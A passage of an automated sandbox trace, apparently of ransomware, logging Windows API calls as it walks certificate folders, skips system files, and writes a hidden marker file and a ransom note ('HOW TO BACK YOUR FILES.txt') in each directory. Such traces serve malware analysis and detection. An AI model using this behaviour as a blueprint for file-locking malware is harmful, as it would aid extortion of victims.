lpString2="NTUSER.DAT") returned -1 [0052.521] lstrcpyW (in: lpString1=0x130ebb8, lpString2="CRLs" | out: lpString1="CRLs") returned="CRLs" [0052.521] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", dwFileAttributes=0x2010) returned 1 [0052.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1205d0 [0052.521] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11eb00 [0052.521] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1205d8 | out: ListHead=0xf68b0, ListEntry=0x1205d8) returned 0x120638 [0052.521] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="Rabbit4444.exe") returned -1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="windows") returned -1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="bootmgr") returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="pagefile.sys") returned -1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="boot") returned 1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="ids.txt") returned -1 [0052.521] lstrcmpiW (lpString1="CTLs", lpString2="NTUSER.DAT") returned -1 [0052.521] lstrcpyW (in: lpString1=0x130ebb8, lpString2="CTLs" | out: lpString1="CTLs") returned="CTLs" [0052.521] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", dwFileAttributes=0x2010) returned 1 [0052.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x120770 [0052.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8a) returned 0x11e808 [0052.522] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x120778 | out: ListHead=0xf68b0, ListEntry=0x120778) returned 0x1205d8 [0052.522] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc6243272, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0 [0052.522] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0052.522] lstrcpyW (in: lpString1=0x130ebb8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.522] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.522] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.523] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.523] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.523] CloseHandle (hObject=0x278) returned 1 [0052.523] CloseHandle (hObject=0x27c) returned 1 [0052.523] GetCurrentThreadId () returned 0xd98 [0052.523] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120778 [0052.523] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0052.523] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e808 | out: hHeap=0xe0000) returned 1 [0052.523] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120770 | out: hHeap=0xe0000) returned 1 [0052.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0052.523] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\" [0052.523] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3" [0052.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.524] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.527] FlushFileBuffers (hFile=0x27c) returned 1 [0052.528] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.528] CloseHandle (hObject=0x27c) returned 1 [0052.528] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 68 [0052.528] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.528] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a10ec1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.529] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.529] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.529] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.529] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.529] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc6243272, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c789, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a10ec1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.529] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.529] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.529] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.529] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.529] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.529] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a10ec1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a10ec1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a10ec1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.529] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.529] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.529] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a10ec1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a10ec1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a10ec1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.529] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.529] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.529] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.529] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.530] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.530] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.530] CloseHandle (hObject=0x278) returned 1 [0052.530] CloseHandle (hObject=0x27c) returned 1 [0052.530] GetCurrentThreadId () returned 0xd98 [0052.530] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1205d8 [0052.530] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0052.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11eb00 | out: hHeap=0xe0000) returned 1 [0052.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1205d0 | out: hHeap=0xe0000) returned 1 [0052.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0052.530] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0052.530] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3" [0052.530] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.532] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.534] FlushFileBuffers (hFile=0x27c) returned 1 [0052.535] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.535] CloseHandle (hObject=0x27c) returned 1 [0052.536] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 68 [0052.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.536] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0052.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.536] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.536] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.536] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.536] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc5fe0cd1, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd3b6c4d7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.536] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.536] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.536] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.536] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.536] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.536] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.536] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.536] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.536] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.536] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0052.536] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\crls\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.537] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.537] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.537] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.537] CloseHandle (hObject=0x278) returned 1 [0052.537] CloseHandle (hObject=0x27c) returned 1 [0052.537] GetCurrentThreadId () returned 0xd98 [0052.537] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x120638 [0052.537] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0052.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0052.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120630 | out: hHeap=0xe0000) returned 1 [0052.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0052.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0052.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3" [0052.538] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.538] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.541] FlushFileBuffers (hFile=0x27c) returned 1 [0052.542] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.542] CloseHandle (hObject=0x27c) returned 1 [0052.542] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 76 [0052.542] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.542] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0052.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.542] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.542] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.542] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.542] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62a3729f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3b6c131, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.543] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.543] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.543] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.543] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.543] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.543] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.543] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.543] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.543] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8a37111, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8a37111, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8a37111, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.543] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0052.543] lstrcpyW (in: lpString1=0x130ebd2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\how 